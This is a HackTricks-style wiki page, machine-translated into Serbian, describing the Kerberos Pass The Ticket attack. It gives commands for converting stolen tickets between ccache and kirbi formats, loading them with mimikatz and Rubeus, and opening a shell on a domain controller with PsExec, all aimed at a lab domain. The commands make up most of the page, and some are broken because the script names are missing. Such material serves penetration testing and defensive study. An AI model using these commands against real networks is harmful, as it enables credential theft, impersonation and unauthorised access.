Pass the Ticket

Support HackTricks

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Pass The Ticket (PTT)

U metodi napada Pass The Ticket (PTT), napadači kradu autentifikacionu kartu korisnika umesto njihove lozinke ili heš vrednosti. Ova ukradena karta se zatim koristi za impostorstvo korisnika, sticanje neovlašćenog pristupa resursima i uslugama unutar mreže.


Swaping Linux and Windows tickets between platforms

Alat ticket_converter konvertuje formate karata koristeći samo kartu samu i izlaznu datoteku.

python velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

U Windows-u Kekeo može se koristiti.

Pass The Ticket Attack

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python jurassic.park/trex@labwws02.jurassic.park -k -no-pass
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd


Koristite Trickest da lako izgradite i automatizujete radne tokove pokretane najnaprednijim alatima zajednice. Pribavite pristup danas:

Podrška HackTricks

Last updated